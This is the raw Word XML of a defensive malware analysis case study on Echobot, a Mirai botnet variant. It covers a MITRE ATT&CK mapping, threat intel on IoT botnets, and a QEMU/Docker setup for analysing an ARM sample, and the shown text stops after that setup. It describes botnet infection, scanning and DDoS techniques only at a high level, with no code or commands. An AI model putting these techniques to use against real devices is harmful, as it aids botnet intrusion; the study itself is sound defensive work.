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2A8B" w14:textId="6BAD94A5" w:rsidR="000C7198" w:rsidRDefault="005D1A12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35EE5F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72400" cy="10029825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21579"/>
                <wp:lineTo x="21547" y="21579"/>
                <wp:lineTo x="21547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130E32E9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5C98B080" w:rsidR="00367ECC" w:rsidRPr="00367ECC" w:rsidRDefault="00C07574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by </w:t>
                            </w:r>
                            <w:r w:rsidR="001C2F14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jami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C6D6" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Delivered By" o:spid="_x0000_s1026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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="257A77F4" w14:textId="5C98B080" w:rsidR="00367ECC" w:rsidRPr="00367ECC" w:rsidRDefault="00C07574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by </w:t>
                      </w:r>
                      <w:r w:rsidR="001C2F14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jami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4C030584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3D7682A6" w:rsidR="00367ECC" w:rsidRPr="00EB0794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</w:pPr>
                            <w:r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>Malware Analysis</w:t>
                            </w:r>
                            <w:r w:rsidR="00EB0794"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 xml:space="preserve"> IoT</w:t>
                            </w:r>
                            <w:r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 xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00C07574"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 xml:space="preserve">Case Study – </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00C07574"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>Mirai</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00C07574"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>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="00C07574" w:rsidRPr="00EB0794">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
                                <w:sz w:val="64"/>
                                <w:szCs w:val="64"/>
                                <w:lang w:val="en-IE"/>
                              </w:rPr>
                              <w:t>Ech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7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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="665890B9" w14:textId="3D7682A6" w:rsidR="00367ECC" w:rsidRPr="00EB0794" w:rsidRDefault="00367ECC" w:rsidP="00367ECC">
                      <w:pPr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</w:pPr>
                      <w:r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>Malware Analysis</w:t>
                      </w:r>
                      <w:r w:rsidR="00EB0794"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 xml:space="preserve"> IoT</w:t>
                      </w:r>
                      <w:r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 xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00C07574"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 xml:space="preserve">Case Study – </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00C07574"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>Mirai</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00C07574"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>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00C07574" w:rsidRPr="00EB0794">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
                          <w:sz w:val="64"/>
                          <w:szCs w:val="64"/>
                          <w:lang w:val="en-IE"/>
                        </w:rPr>
                        <w:t>Echobot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625E34BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2533650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5110480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4803775" cy="1623695"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="257" y="0"/>
                    <wp:lineTo x="257" y="21287"/>
                    <wp:lineTo x="21329" y="21287"/>
                    <wp:lineTo x="21329" y="0"/>
                    <wp:lineTo x="257" y="0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9BF9" w14:textId="2F2C20F1" w:rsidR="00C07574" w:rsidRPr="00BD1F1C" w:rsidRDefault="00C07574" w:rsidP="00C07574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17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4</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EB4F52D" w14:textId="7899716F" w:rsidR="00367ECC" w:rsidRPr="00367ECC" w:rsidRDefault="00367ECC" w:rsidP="00367ECC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099CC" id="Intro To Report" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:199.5pt;margin-top:402.4pt;width:378.25pt;height:1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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="31A19BF9" w14:textId="2F2C20F1" w:rsidR="00C07574" w:rsidRPr="00BD1F1C" w:rsidRDefault="00C07574" w:rsidP="00C07574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17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4</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EB4F52D" w14:textId="7899716F" w:rsidR="00367ECC" w:rsidRPr="00367ECC" w:rsidRDefault="00367ECC" w:rsidP="00367ECC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lang w:val="en-I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5035AF" w14:textId="127070B2" w:rsidR="00421C0E" w:rsidRDefault="00421C0E" w:rsidP="00421C0E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc101201909"/>
      <w:r w:rsidRPr="00421C0E">
        <w:lastRenderedPageBreak/>
        <w:t>Exclusive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1B7C1613" w14:textId="7B099FB7" w:rsidR="00BF6A60" w:rsidRDefault="00EB0794" w:rsidP="000E78BF">
      <w:r>
        <w:t>Mirai is a malware that was discovered by MalwareMustDie – a malware research group in August 2016.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1067">
        <w:t xml:space="preserve"> The malware </w:t>
      </w:r>
      <w:r w:rsidR="00BD416A">
        <w:t>infects</w:t>
      </w:r>
      <w:r w:rsidR="00FA1067">
        <w:t xml:space="preserve"> devices running </w:t>
      </w:r>
      <w:r w:rsidR="00EB3DAD">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00FA1067">
        <w:t xml:space="preserve"> - including IoT devices such as routers, firewalls, cameras</w:t>
      </w:r>
      <w:r w:rsidR="00323367">
        <w:t xml:space="preserve">, servers, smart home </w:t>
      </w:r>
      <w:r w:rsidR="006E76B1">
        <w:t>hubs</w:t>
      </w:r>
      <w:r w:rsidR="00FA1067">
        <w:t xml:space="preserve"> and transform them into remotely controlled bots that can be used by the attacker </w:t>
      </w:r>
      <w:r w:rsidR="008A63DA">
        <w:t>to simulate large DDoS attacks</w:t>
      </w:r>
      <w:r w:rsidR="004B584C">
        <w:t xml:space="preserve"> to targeted domains</w:t>
      </w:r>
      <w:r w:rsidR="008A63DA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD416A">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD416A">
        <w:t xml:space="preserve"> disrupt services and platforms</w:t>
      </w:r>
      <w:r w:rsidR="008A63DA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529A3CF" w14:textId="09683123" w:rsidR="00074A3D" w:rsidRDefault="00074A3D" w:rsidP="000E78BF">
      <w:r>
        <w:t xml:space="preserve">This malware analysis </w:t>
      </w:r>
      <w:r w:rsidR="003B5771">
        <w:t>case study</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will go over a Mirai variant called ‘Echobot’ that was discovered</w:t>
      </w:r>
      <w:r w:rsidR="003868E2">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003868E2">
        <w:t>Palto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003868E2">
        <w:t xml:space="preserve"> Alto Network Researchers in June </w:t>
      </w:r>
      <w:r w:rsidR="003B5771">
        <w:t>2019</w:t>
      </w:r>
      <w:r w:rsidR="00F25E0D">
        <w:t>. We will go over the capabilities of the malware from our own analysis and at the end of the case study provide recommendations for mitigating and preventing the malware from spreading.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19A69E92" w14:textId="0064E704" w:rsidR="00487FD7" w:rsidRDefault="000E78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01909" w:history="1">
            <w:r w:rsidR="00487FD7" w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exclusive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00487FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00487FD7"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101201909 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00487FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00487FD7"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2</w:t>
            </w:r>
            <w:r w:rsidR="00487FD7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281E1138" w14:textId="4432303D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0" w:history="1">
            <w:r w:rsidRPr="000725A6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6471" w14:textId="3DD7FF8B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1" w:history="1">
            <w:r w:rsidRPr="000725A6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0762" w14:textId="052E8386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2" w:history="1">
            <w:r w:rsidRPr="000725A6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2D9E" w14:textId="31C64009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3" w:history="1">
            <w:r w:rsidRPr="000725A6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D958" w14:textId="41F35A39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4" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Main Malwar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E1BA" w14:textId="5F83124E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5" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai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97D3" w14:textId="7A056A18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6" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploits/Vunl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7237" w14:textId="7F317AAF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7" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Maintaining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656B" w14:textId="39253254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8" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command &amp; Control (C&amp;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B7FA" w14:textId="1B76D694" w:rsidR="00487FD7" w:rsidRDefault="00487F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19" w:history="1">
            <w:r w:rsidRPr="000725A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C032" w14:textId="5375DDAD" w:rsidR="00487FD7" w:rsidRDefault="00487F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0" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network I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17DB" w14:textId="2210B0C4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1" w:history="1">
            <w:r w:rsidRPr="000725A6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F04B" w14:textId="79C9F35C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2" w:history="1">
            <w:r w:rsidRPr="000725A6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4EE0" w14:textId="42F69C7E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3" w:history="1">
            <w:r w:rsidRPr="000725A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DB36" w14:textId="451DA416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4" w:history="1">
            <w:r w:rsidRPr="000725A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FC6" w14:textId="7887D047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5" w:history="1">
            <w:r w:rsidRPr="000725A6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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6431" w14:textId="7C8679BB" w:rsidR="00487FD7" w:rsidRDefault="00487F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6" w:history="1">
            <w:r w:rsidRPr="000725A6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8FFB" w14:textId="0F828BDC" w:rsidR="00487FD7" w:rsidRDefault="00487F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101201927" w:history="1">
            <w:r w:rsidRPr="000725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EC6C" w14:textId="02C76468" w:rsidR="00224482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D8F8D" w14:textId="77777777" w:rsidR="00224482" w:rsidRDefault="00224482">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0FDF0FD5" w14:textId="77777777" w:rsidR="00224482" w:rsidRDefault="00224482">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6F971794" w14:textId="7408C79F" w:rsidR="008107D3" w:rsidRPr="00224482" w:rsidRDefault="00C97199">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7DC02981" w14:textId="12A84A22" w:rsidR="002A588A" w:rsidRDefault="006A1F82" w:rsidP="002A588A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc101201910"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="002A588A">
        <w:t>itre Att&amp;ck</w:t>
      </w:r>
      <w:r w:rsidR="004D1853">
        <w:t xml:space="preserve"> Matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="36D5B9F6" w14:textId="767B299A" w:rsidR="002A588A" w:rsidRPr="00D50208" w:rsidRDefault="00B54FE6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F7FA7E" wp14:editId="12B3F105">
            <wp:extent cx="5943600" cy="459295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D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="007D39FE" w:rsidRPr="00D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001E0D31" w:rsidRPr="00D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="005F080E" w:rsidRPr="00D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="001E0D31" w:rsidRPr="00D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F080E" w:rsidRPr="00D50208">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Navigator</w:t>
      </w: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29507DD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C670D4">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>583.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031DC7A6" w14:textId="3473C180" w:rsidR="00820A1B" w:rsidRDefault="00C670D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Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1983" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29046C47" w14:textId="2C787A12" w:rsidR="00820A1B" w:rsidRDefault="00C670D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0D4">
              <w:t>Acquire Infrastructure: Botnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ED3065" w14:textId="188E1F45" w:rsidR="00820A1B" w:rsidRDefault="00C670D4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alware variant infects IoT devices to perform large DDoS attacks as a botnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E82790" w14:paraId="00BC870D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252E5836" w:rsidR="00E82790" w:rsidRDefault="00F45F6A" w:rsidP="00B06445">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F45F6A">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42250796" w14:textId="3C1CDB93" w:rsidR="00E82790" w:rsidRDefault="00F45F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F6A">
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1983" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21A0DA3D" w14:textId="710090C0" w:rsidR="00E82790" w:rsidRDefault="00F45F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F6A">
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E11A59" w14:textId="243EFEFF" w:rsidR="00E82790" w:rsidRDefault="00F45F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ai variant takes advantage of multiple unpatched </w:t>
            </w:r>
            <w:r w:rsidR="007D2283" w:rsidRPr="00423CFF">
              <w:t>design</w:t>
            </w:r>
            <w:r w:rsidR="00423CFF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00423CFF">
              <w:t>vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in IoT Devices </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008611D0" w14:paraId="578DB6E2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0D6E9F4" w14:textId="0ACDBAD0" w:rsidR="008611D0" w:rsidRPr="008611D0" w:rsidRDefault="008611D0" w:rsidP="00B06445">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008611D0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r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FDA11A7" w14:textId="1010773F" w:rsidR="008611D0" w:rsidRPr="00F45F6A" w:rsidRDefault="008611D0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2BE40F9B" w14:textId="34430DEB" w:rsidR="008611D0" w:rsidRPr="00F45F6A" w:rsidRDefault="008611D0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7378246" w14:textId="1C8157DB" w:rsidR="008611D0" w:rsidRDefault="008611D0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</w:t>
            </w:r>
            <w:r w:rsidR="00643CD6">
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:t>irai variant propagates itself to other IoT Devices via RCE (Remote Code Execution) Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00295672" w14:paraId="22BF5E03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0EA1074" w14:textId="1321FC1A" w:rsidR="00295672" w:rsidRPr="008611D0" w:rsidRDefault="0029567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03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E85F3C8" w14:textId="06EA39A4" w:rsidR="00295672" w:rsidRDefault="0029567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13E5F7A1" w14:textId="5875A786" w:rsidR="00295672" w:rsidRDefault="0029567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for Client Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7859A943" w14:textId="4C2885AC" w:rsidR="00295672" w:rsidRDefault="0029567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irai variant exploits known vulnerabilities in routers, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cameras</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and other smart devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005614C1" w14:paraId="6F139D3C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3310BF9" w14:textId="6FE8437A" w:rsidR="005614C1" w:rsidRDefault="005614C1" w:rsidP="00B06445">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005614C1">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>T1046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BA54DF0" w14:textId="3AD9D445" w:rsidR="005614C1" w:rsidRDefault="005614C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4FABBB0A" w14:textId="4B3737FB" w:rsidR="005614C1" w:rsidRDefault="005614C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Service Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A335A15" w14:textId="00ECFFCE" w:rsidR="005614C1" w:rsidRDefault="005614C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lware scans TCP ports of random IP addresses and hosts </w:t>
            </w:r>
            <w:r w:rsidR="006705D4">
              <w:t>to find new vulnerable IoT Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005614C1" w14:paraId="1FDEA8B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2455F3" w14:textId="4164A647" w:rsidR="005614C1" w:rsidRPr="005614C1" w:rsidRDefault="005614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1049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79022C62" w14:textId="3F953933" w:rsidR="005614C1" w:rsidRDefault="005614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636D9506" w14:textId="145D18D3" w:rsidR="005614C1" w:rsidRDefault="005614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etwork Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DFAF6E5" w14:textId="490E7280" w:rsidR="005614C1" w:rsidRDefault="005614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lware tries to identify IoT devices to infect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00323367" w14:paraId="2B6304A6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2672188" w14:textId="768236C1" w:rsidR="00323367" w:rsidRDefault="001B5D85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498</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="197E1D93" w14:textId="01AB0C3A" w:rsidR="00323367" w:rsidRDefault="001B5D85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1641489A" w14:textId="21501942" w:rsidR="00323367" w:rsidRDefault="001B5D85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Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618AF843" w14:textId="587964C7" w:rsidR="00323367" w:rsidRDefault="001B5D85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ai variant performs</w:t>
            </w:r>
            <w:r w:rsidR="00272DE9">
              <w:t xml:space="preserve"> network</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DDoS attacks via its infected hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26F1D0A3" w14:textId="45AF9D76" w:rsidR="002A588A" w:rsidRDefault="002A588A" w:rsidP="00421C0E"/>
    <w:p w14:paraId="7308D678" w14:textId="4E0B51D7" w:rsidR="006F476B" w:rsidRDefault="00511AF4" w:rsidP="00511AF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc101201911"/>
      <w:r>
        <w:t>Threat intel insig</w:t>
      </w:r>
      <w:r w:rsidR="008302D3">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="03A6C22C" w14:textId="41316EC9" w:rsidR="002C22E0" w:rsidRDefault="002A214D" w:rsidP="005A463F">
      <w:r>
        <w:t>There is not enough evidence or information to attribute this attack to a specific group</w:t>
      </w:r>
      <w:r w:rsidR="00FA749B">
        <w:t xml:space="preserve"> or threat actor</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E32DD">
        <w:t xml:space="preserve"> Motivations </w:t>
      </w:r>
      <w:r w:rsidR="00EA70F1">
        <w:t xml:space="preserve">for the threat actor </w:t>
      </w:r>
      <w:r w:rsidR="003E32DD">
        <w:t>behind the Echobot attack in 2019 are unknown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C3153" w14:textId="66B36890" w:rsidR="000E0283" w:rsidRPr="005A463F" w:rsidRDefault="002A214D" w:rsidP="005A463F">
      <w:r>
        <w:t xml:space="preserve">IoT Malware has become more prevalent over the past few years due to the leaking of the </w:t>
      </w:r>
      <w:r w:rsidR="00A364C3">
        <w:t xml:space="preserve">Mirai source code, allowing possibly anyone to create </w:t>
      </w:r>
      <w:r w:rsidR="005A21BA">
        <w:t>their own</w:t>
      </w:r>
      <w:r w:rsidR="00A364C3">
        <w:t xml:space="preserve"> IoT botnets with little skill</w:t>
      </w:r>
      <w:r w:rsidR="002B2B47">
        <w:t xml:space="preserve"> and by modifying </w:t>
      </w:r>
      <w:r w:rsidR="008C5476">
        <w:t xml:space="preserve">snippets of the code to suit </w:t>
      </w:r>
      <w:r w:rsidR="00BD1435">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="008C5476">
        <w:t xml:space="preserve"> needs</w:t>
      </w:r>
      <w:r w:rsidR="00A364C3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D6742F">
        <w:t>With multiple IoT devices being rarely patched long-term</w:t>
      </w:r>
      <w:r w:rsidR="00FF55CE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D6742F">
        <w:t xml:space="preserve"> and more vulnerabilities being found and exploited</w:t>
      </w:r>
      <w:r w:rsidR="002B2B47">
        <w:t xml:space="preserve"> there may b</w:t>
      </w:r>
      <w:r w:rsidR="0070672C">
        <w:t xml:space="preserve">e a steady increase of IoT Botnets </w:t>
      </w:r>
      <w:r w:rsidR="00FF55CE">
        <w:t>and malware in the wild</w:t>
      </w:r>
      <w:r w:rsidR="0070672C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E32DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5B151" w14:textId="6E29D5E0" w:rsidR="00511AF4" w:rsidRDefault="005A463F" w:rsidP="005A463F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc101201912"/>
      <w:r w:rsidRPr="005A463F">
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="50B1E235" w14:textId="4FD1F020" w:rsidR="00C924B1" w:rsidRDefault="00C924B1" w:rsidP="005A463F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23F731D8" wp14:editId="43F5CD4C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>590677</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5876290" cy="2731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"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="587629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A16">
        <w:t>In this case study, we used an architecture-specific</w:t>
      </w:r>
      <w:r w:rsidR="002B2D6F">
        <w:t xml:space="preserve"> virtual</w:t>
      </w:r>
      <w:r w:rsidR="00255A16">
        <w:t xml:space="preserve"> machine for ARM </w:t>
      </w:r>
      <w:r w:rsidR="0040351E">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00DF2DD6">
        <w:t xml:space="preserve"> dynamically</w:t>
      </w:r>
      <w:r w:rsidR="0040351E">
        <w:t xml:space="preserve"> analyze our specified malware sample ‘ECHOBOT.arm6’</w:t>
      </w:r>
      <w:r w:rsidR="00B71000">
        <w:t xml:space="preserve"> via Qemu 4.1.1 and BuildRoot 2</w:t>
      </w:r>
      <w:r w:rsidR="00B34D1C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B71000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD3D12">
        <w:t>Using Docker, to import the ARM-machine</w:t>
      </w:r>
      <w:r w:rsidR="00116EA4">
        <w:t xml:space="preserve"> we ran the sample for 60 seconds </w:t>
      </w:r>
      <w:r w:rsidR="00E442A6">
        <w:t>to collect system calls and network traffic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9B33E" w14:textId="47D1B600" w:rsidR="00C924B1" w:rsidRPr="006A6690" w:rsidRDefault="00C924B1" w:rsidP="00C924B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6690">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure 2.1 – Using Docker, Qemu/BuildRoot to analyze the Mirai sample dynamically</w:t>
      </w:r>
